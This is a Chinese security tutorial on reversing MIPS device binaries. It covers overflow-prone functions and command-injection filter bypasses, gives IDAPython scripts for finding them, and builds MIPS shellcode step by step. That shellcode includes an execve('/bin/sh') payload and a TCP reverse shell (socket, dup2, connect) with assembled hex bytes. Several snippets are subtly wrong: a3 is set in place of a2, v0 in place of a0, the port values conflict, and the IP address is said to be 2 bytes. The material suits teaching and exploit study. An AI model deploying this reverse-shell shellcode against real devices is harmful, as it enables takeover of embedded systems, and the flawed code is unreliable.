附录3-1: 指令集分析-MIPS
一、MIPS 指令集逆向技巧
在逆向分析一个 mips 指令集架构的二进制程序时,可以使用敏感函数定位的方法,快速定位敏感函数,如 system、sprintf、strcpy 等命令执行和容易发生栈溢出的函数。
1.1 常见敏感函数类别
栈溢出敏感函数
在 MIPS 指令集中,特别是智能设备,一般来说栈溢出漏洞较为常见,也是比较容易利用的一类漏洞,发生栈溢出可能的函数有 strcpy,sprintf,snprint, strchr 等。
1) strcpy 类函数如下所示,直接从 http 数据包参数中的数据内容,直接复制到栈上,没有经过任何的判断与处理,因此可以通过栈溢出越界的 buffer 覆盖当前函数的返回地址,可以进一步利用 ROP 技术来获取目标程序的 shell。
strcpy(stack, buf_from_http);
2)sprintf类,如果格式化中有“%s”格式化字符串,同时没有对输入的数据进行长度判断的话,则也有可能造成栈溢出漏洞。
sprintf(stack, "%s", buf_from_http);
snprintf类,snprintf 的返回值是输入的长度,而不是输出的长度,因此下面的代码则有可能存在漏洞,大致的利用原理因为,第一个snprinf返回值是输入的长度,一般输入的长度大于sizeof(stack),则第二个 snprintf 的 size 则变为负数,snprintf 的大小是无符号的,因此变成了一个超大的size,导致第二个可以用来覆盖返回地址。值得注意的是,这样类型的 overflow 还可以用来bypass canary。
int left = snprintf(stack, sizeof(stack),"%s", buf_from_http1); snprintf(stack+left, sizeof(stack)-left, "%s", buf_from_http2);
4) strchr类,如下所示,乍一看好像使用了strncpy规定了复制的长度,但仔细看就会发现,复制的长度也是由输入的字符串来决定的,因此直接在?前面输入超长的字符即可实现overflow
char *query = strchr(url, '?'); strncpy(stack, url, quey - url -1);
如:index.phpaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa?a=1。只要 QURTY_STRING 够长就可以导致栈溢出。
注入类型的敏感函数(逻辑)
注入类型的漏洞相对来说就简单很多,只要看数据流的处理流程,确定输入能否控制敏感函数即可。 常见的敏感函数如system、popen、exec、execve等,在注入类型漏洞中,对于过滤的关键词绕过是比较关键的,例如没有空格的时候可以使用 $IFS进行绕过。也可以通过一些编码比如xxd,base64等。
1.2 IDA 自动定位敏感函数插件
这里推荐一个比较方便定位二进制程序敏感函数的 python 插件:MipsAduit。
该工具是一个 MIPS 静态汇编审计辅助脚本,通过敏感函数回溯的方法,可以较方便的审计出 C 语言中的危险函数。
插件的安装方法
在 IDA -> file -> Script File 中加载即可,加载完成后会在控制台中输出相应的信息。
点击相应的地址就可以跳转过去,对应的位置会被高亮显示:
1.3 使用 IDAPython 自带函数来定位敏感函数
IDAPython 自带很多的 API,可以使用这这些 API 函数来辅助我们进行函数的定位。
如,定位出调用 sprintf 函数的地址列表的代码:
sprintf_list = set()
for loc,name in Names():
if "sprintf" == name:
for addr in XrefsTo(loc): # 列出调用 sprintf 的函数地址
sprintf_list.add(GetFunctionName(addr.frm))
print("\\n\\n")
print(sprintf_list) # 打印输出可以直接在 IDA 中,File -> Script command... 的输入框中输入这些代码,点击 run 就可以执行:
运行完成之后的结果使用 print 函数输出之后,会打印在 Output window 中:
这些输出的地址就是引用了 sprintf 方法的函数,同样双击函数名可以直接跳转到相应的地址。
读者可以在自行在
for addr in XrefsTo(loc):语句下加入其他过滤语句,以达到更准确定制自己想要的功能。
如这里想要排除 sytem 敏感函数第一个参数为 .data 段中的字符,且不包含 %s 字符的话(说明格式化参数不可控),如我们需要排除这种情况:
system("rm -f /tmp/auth_engineer");
条件可以写成这样:
system_list = set()
for loc,name in Names():
if "system" == name:
for addr in XrefsTo(loc): # 列出调用 system 的函数地址
system_list.add(addr.frm) print("\\n\\n")
system_args_list = set()
for addr in system_list:
arg2_addr = 0
arg2_addr = RfirstB(addr) # 获取对 a0 语句赋值的语句
arg2_str = GetString(Dword(GetOperandValue(arg2_addr,1))) # 获取 a0 参数的值的字符串
try:
if "%s" not in arg2_str:
system_args_list.add(addr) # 排除这种情况
else:
pass
except:
pass
result_list = system_list-system_args_list # 取差集,得到最终结果
for addr in result_list:
print(hex(addr))二、MIPS shellcode 编写
Shellcode 是一段可以执行特定功能的特殊汇编代码,在设备漏洞利用过程中,尤其是栈溢出漏洞,我们一般都会使用调用 shellcode 的方法来进行攻击(ret2shellcode)。
MIPS 架构的 shellcode 和 x86 架构下的 shellcode 也会有一些差异,同时在实际利用 MIPS 的 shellcode 时可能会有坏字符的问题,因此还是需要掌握一些 shellcode 编写的技巧,这样在实际利用时才能比较灵活的运用。
2.1 MIPS 系统调用
在写 shellcode 过程中,都会用到系统调用。和 x86 的系统调用相似,MIPS 系统调用也会用到系统调用号。
使用系统调用的过程依旧是先赋值好参数(a0、a1、$a2),然后使用 syscall 指令触发中断,来调用相应函数:如这里如果需要调用 exit(1) 函数,可以表示成以下的汇编代码:
li $a0,1
li $v0,4001 // sys_exit
syscall 0x40404与 x86 指令不同的是,这里的系统调用号是存储在 v0 寄存器中。
MIPS 的系统调用号可以在 /usr/mips-linux-gnu/include/asm/unistd.h 中看到,调用号是从 4000开始:
关于 mips 交叉环境,可以直接使用下面的命令安装:
sudo apt-get install libc6-mips-cross
其他架构的环境安装方法类似。
2.2 MIPS 指令汇编/反汇编
在将我们写好的 MIPS 汇编转换成 shellcode 时,可以使用 rasm2 工具进行转换,这个工具是 radare 工具的一个专门进行汇编/反汇编的工具,关于工具的安装方法见参考链接。
例如,我们可以使用命令下面的命令对 MIPS 指令集进行汇编:
➜ ~ rasm2 -a mips -b 32 "addiu a0,zero,1" 01000424
参数说明:
-a: 指定架构为 MIPS
-b: 指定程序位数
-d: 反汇编也可以进行反汇编:
➜ ~ rasm2 -a mips -b 32 -d "01000424"
addiu a0, zero, 1 -
可以指定 -f 参数来将文件内容中的代码语句读取并汇编:
➜ ~ cat test.asm
addiu a1,zero,2;
sw 2,-24(sp);
➜ ~ rasm2 -a mips -b 32 -f ./test.asm
02000524e8ffa2af注意这里每一句汇编语句后面都需要加上分号。C 参数还可以生成 shellcode 格式,使用起来比较方便:
➜ ~ rasm2 -a mips -b 32 -C -f ./test.asm
"\\x02\\x00\\x05\\x24\\xe8\\xff\\xa2\\xaf"举个例子,在 C 语言中执行 execve 函数来获取 shell 的代码如下:
int main(){ execve("/bin/sh",0,0); return 0; }对应的汇编代码为:
lui $t6,0x2f62
ori t6,t6,0x696e
sw t6,28(sp) // 将 "/bin" 存入 $sp+28 的栈空间
lui $t7,0x2f2f
ori t7,t7,0x7368
sw t7,32(sp) // 将 "//sh" 存入 $sp+28 的栈空间
sw zero,36(sp) // 0 截段
la a0,28(sp) // a0 寄存器指向 "/bin//sh" 栈空间
addiu a1,zero,0
addiu a2,zero,0
addiu v0,zero,4011 // execve 的系统调用号为 4011
syscall 0x40404 // 调用 execve("/bin/sh",0,0);在第一、第二行中,lui 和 ori 指令配合使用可以赋值一个 4 字节空间,lui 指令赋值高位 2 字节,ori 指令赋值低位 2 字节。
2.3 反弹 shell 的 shellcode 汇编代码编写
在实际使用 shellcode 进行利用的过程中,一般是编写、使用能够反弹 shell 的 shellcode 来 getshell 而不使用直接执行 execve 函数的方法。针对于反弹 shell 的 shellcode 汇编代码,编写起来会更加复杂,但是系统调用的过程步骤都是不变的:
socket(2,1,0) -> dup2(s,0/1/2) -> connect(s,(sockaddr *)&addr,0x10) \\
-> execve("/bin/sh",["/bin/sh",0],0) -> exit(0)那么这里就对几个函数调用的步骤进行分解,依次写出系统调用的汇编代码。
socket 系统调用
这里我们使用 TCP reverse shell 的方式来反弹 shell。那么调用 socket 函数以 C 语言来表示的话如下:
socket(AF_INET,SOCK_STREAM, 0)
在 xxx 中,我们可以查到 AF_INET、SOCK_STREAM 常量对应的数值为 2 和 1。同样可以知道 socket 的系统调用号为 4183。
第一步先给三个参数(a0、a1、a2)赋值,即:
addiu $a0, $zero, 2;
addiu $a1, $zero, 1;
addiu $a3, $zero, 0;
addiu $v0, $zero, 0x1057;
syscall 0x40404;
sw $v0,10($sp); // 将描述符存入栈中使用 rasm2 进行汇编转换为 shellcode:
mips cat conn
addiu a0, zero, 2;
addiu a1, zero, 1;
addiu a3, zero, 0;
addiu v0, zero, 0x1057;
syscall 0x40404;
sw v0,10(sp);
mips rasm2 -a mips -b 32 -C -f ./conn "\\x02\\x00\\x04\\x24\\x01\\x00\\x05\\x24\\x00\\x00\\x07\\x24\\x57\\x10\\x02\\x24\\x0c\\x00\\x00\\x00"在将汇编代码写进文件时,因为 rasm2 无法识别 $,所以需要手动去掉 $ 符号。
2.4 dup2 系统调用
dup2 函数的作用是复制文件描述符,将 socket 描述符复制 stdin、stdout、stderr 描述符中,这里我们就能在远程与本地交互。
以 C 语言来表示的话如下:
dup2(socket_obj,0)
dup2(socket_obj,1)
dup2(socket_obj,2)dup2 的系统调用号为 4063。
对应的汇编表示为:
lw v0,10(sp); // sys_socket 系统调用的返回值,即 sock 对象
addiu $a1,zero,0
addiu $v0,zero,4063
syscall 0x40404
lw v0,10(sp); // sys_socket 系统调用的返回值,即 sock 对象
addiu $a1,zero,1
addiu $v0,zero,4063
syscall 0x40404
lw v0,10(sp); // sys_socket 系统调用的返回值,即 sock 对象
addiu $a1,zero,2
addiu $v0,zero,4063
syscall 0x40404shellcode 表示:
➜ mips rasm2 -a mips -b 32 -C -f ./conn
"\\x20\\x20\\x40\\x00\\x00\\x00\\x05\\x24\\xdf\\x0f\\x02\\x24\\x0c\\x00\\x00\\x00\\x20\\x20\\x40\\x00" \\
"\\x01\\x00\\x05\\x24\\xdf\\x0f\\x02\\x24\\x0c\\x00\\x00\\x00\\x20\\x20\\x40\\x00\\x02\\x00\\x05\\x24" \\
"\\xdf\\x0f\\x02\\x24\\x0c\\x00\\x00\\x00"经常在这里,我们会加上一个循环,使得最终生成的 shellcode 会短一些,如:
lw $v0,10($sp)
addiu $a1,$zero,2
loop:
addiu $v0,$zero,4063
syscall 0x40404
addiu $t5,$zero,-1
addi $a1,$a1,-1
bne $a1,$t5,loop2.5 connect 系统调用
connect 函数的作用是通过 socket 连接到指定的 ip 地址监听的端口。函数原型为:
int connect(int sockfd, const struct sockaddr *addr,socklen_t addrlen);
第一个参数为 socket 函数返回的 sock 对象,第二个参数为指定服务端 ip 和端口的结构体,第三个参数为结构体的大小。
示例的 C 语言源代码:
struct sockaddr_in server;
servser.sin_family=AF_INET;
server.sin_port=htons(6666);
server.sin_addr.s_addr=inet_addr("127.0.0.1");
connect(sock,(struct sockaddr *)&server,sizeof(server));这里重点是 connect 函数的第二个参数,这个参数为 sockaddr 结构体,这个结构体的原型如下:
struct sockaddr {
sa_family_t sin_family; //地址族,2 个字节
char sa_data[14]; //14字节,包含套接字中的目标地址和端口信息
};但是一般在这里,我们会先使用 sockaddr_in 结构体,将 ip 和端口进行赋值,再将其强制类型转换为 sockaddr。因为 sockaddr 结构体的 IP 地址和端口段都包含在了 sa_data 段,不太容易直接赋值。
sockaddr 结构体的原型如下:
整个结构体大小固定为 16 字节。
根据这个结构体的格式,我们将示例代码编译成可执行程序,在 gdb 中调试到相应位置,查看相关的的内存表示。查看 sockaddr_in 结构体的内存值:
pwndbg> x/2xw 0x76fff5ca
0x76fff5ca: 0x00027a69 0x7f000001 0x0002:表示 TCP 协议族,大小为 2 字节。0x7a69:表示端口号,大小为 2 字节。0x7f000001:表示 IP 地址,大小为 2 字节,在这里表示的 IP 为 127.0.0.1。
相应的汇编代码如下:
lw v0,10(sp)
move a0,v0
addiu,a2,zero,0x10
lui $t6,0x2 // 协议族为 2
ori t6,t6,0x7a69 // 端口号为 0x7a69
sw t6,20(sp) // 将 0x00027a69 存入栈中
lui $t7,0x7f00
ori t7,t7,0x1
sw t7,24(sp) // 将 0x7f000001 存入栈中,与 0x00027a69 相邻
la a1,20(sp) // 栈地址赋值给 a1 寄存器
addiu v0,zero,4170 // sys_connect syscall 0x40404在调试中类似这种情况就是对的:
2.6 execve 系统调用
这里的 execve 的系统调用同样是执行 execve("/bin/sh",0,0); 函数,写法参考上文,不在赘述。
2.7 调试方法
在编写 shellcode 的过程中,可以对每一部分的汇编代码进行调试,调试方法如下。
将汇编语句加上 main 符号
.global main
main:
li $a0,2
li $a1,1
li $a3,0
li $v0,4183
syscall 0x40404汇编、链接
mips-linux-gnu-as --32 socket.S -o socket.o
mips-linux-gnu-ld -e main socket.o -o socketqemu 调试
在一个终端执行命令:
qemu-mips-static -g 1234 -L /usr/mips-linux-gnu ./socket另外一个终端:
gdb-multiarch ./socket就可以在 gdb 中进行正常的调试。
将上述三段汇编语句连起来就可以得到最终的 reverse shell 的汇编语句,同样的使用 rasm2 将其汇编成 shellcode 格式即可。对于最终得到的 shellcode,我们经常会进行指令的优化,也就是将一些指令进行替换或者将 shellcode 进行编码,从而避免一些坏字符。
来源: 海特实验室
Last updated